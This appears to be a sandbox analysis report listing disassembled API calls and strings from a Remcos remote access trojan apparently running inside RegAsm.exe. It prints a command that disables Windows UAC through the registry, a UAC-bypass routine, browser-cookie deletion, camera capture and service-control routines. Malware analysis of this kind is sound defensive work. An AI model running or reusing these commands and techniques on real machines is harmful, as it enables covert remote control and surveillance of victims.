                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • _memcmp.LIBVCRUNTIME ref: 00445423
                    • _free.LIBCMT ref: 00445494
                    • _free.LIBCMT ref: 004454AD
                    • _free.LIBCMT ref: 004454DF
                    • _free.LIBCMT ref: 004454E8
                    • _free.LIBCMT ref: 004454F4
                    Strings
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID: C
                    Strings
                    Similarity
                    • API ID:
                    • String ID: tcp$udp
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004018BE
                    • ExitThread.KERNEL32 ref: 004018F6
                    • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    Strings
                    Similarity
                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                    • String ID: PkG$XMG$NG$NG
                    APIs
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                    • MoveFileW.KERNEL32 ref: 00407A6A
                    • CloseHandle.KERNEL32(00000000), ref: 00407A95
                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                    Strings
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                    • String ID: .part
                    APIs
                    • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                    • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                    • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                    Similarity
                    • API ID: InputSend
                    APIs
                    Strings
                    Similarity
                    • API ID: __freea$__alloca_probe_16_free
                    • String ID: a/p$am/pm$zD
                    APIs
                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                    Strings
                    Similarity
                    • API ID: Enum$InfoQueryValue
                    • String ID: [regsplt]$xUG$TG
                    APIs
                    • GetConsoleCP.KERNEL32 ref: 0044B3FE
                    • __fassign.LIBCMT ref: 0044B479
                    • __fassign.LIBCMT ref: 0044B494
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    APIs
                    Strings
                    Similarity
                    • API ID: _free
                    • String ID: D[E$D[E
                    APIs
                    • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                    Strings
                    Similarity
                    • API ID: CloseEnumInfoOpenQuerysend
                    • String ID: xUG$NG$NG$TG
                    APIs
                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • _wcslen.LIBCMT ref: 0041B763
                    Strings
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                    APIs
                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                    Strings
                    Similarity
                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                    APIs
                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                    • _free.LIBCMT ref: 00450F48
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00450F53
                    • _free.LIBCMT ref: 00450F5E
                    • _free.LIBCMT ref: 00450FB2
                    • _free.LIBCMT ref: 00450FBD
                    • _free.LIBCMT ref: 00450FC8
                    • _free.LIBCMT ref: 00450FD3
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                    • int.LIBCPMT ref: 00411183
                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                    • String ID: (mG
                    APIs
                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    APIs
                    • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                    • CoUninitialize.OLE32 ref: 00407629
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitializeObjectUninitialize_wcslen
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                    • GetLastError.KERNEL32 ref: 0040BAE7
                    Strings
                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                    • [Chrome Cookies not found], xrefs: 0040BB01
                    • UserProfile, xrefs: 0040BAAD
                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    APIs
                    • AllocConsole.KERNEL32 ref: 0041CDA4
                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AllocOutputShowWindow
                    • String ID: Remcos v$4.9.4 Pro$CONOUT$
                    APIs
                    • __allrem.LIBCMT ref: 0043AC69
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                    • __allrem.LIBCMT ref: 0043AC9C
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                    • __allrem.LIBCMT ref: 0043ACD1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    APIs
                    • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prologSleep
                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                    APIs
                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                    • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                    • String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                    • String ID:
                    APIs
                    • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                    • _free.LIBCMT ref: 0044824C
                    • _free.LIBCMT ref: 00448274
                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                    • _abort.LIBCMT ref: 00448293
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                    • _free.LIBCMT ref: 00443540
                    • _free.LIBCMT ref: 0044354A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: 82K$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .P
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ClassCreateErrorLastRegisterWindow
                    • String ID: 0$MsgWindowClass
                    APIs
                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                    • CloseHandle.KERNEL32(?), ref: 004077AA
                    • CloseHandle.KERNEL32(?), ref: 004077AF
                    Strings
                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateProcess
                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                    Strings
                    • SG, xrefs: 004076DA
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                    • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                    • CloseHandle.KERNEL32(?), ref: 00405140
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID: KeepAlive | Disabled
                    APIs
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: PlaySound$HandleLocalModuleSleepTime
                    • String ID: Alarm triggered
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                    • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                    Strings
                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                    • API String ID: 3024135584-2418719853
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • _free.LIBCMT ref: 00444E06
                    • _free.LIBCMT ref: 00444E1D
                    • _free.LIBCMT ref: 00444E3C
                    • _free.LIBCMT ref: 00444E57
                    • _free.LIBCMT ref: 00444E6E
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                    • _free.LIBCMT ref: 004493BD
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00449589
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID:
                    • API String ID: 1286116820-0
                    APIs
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                    • String ID:
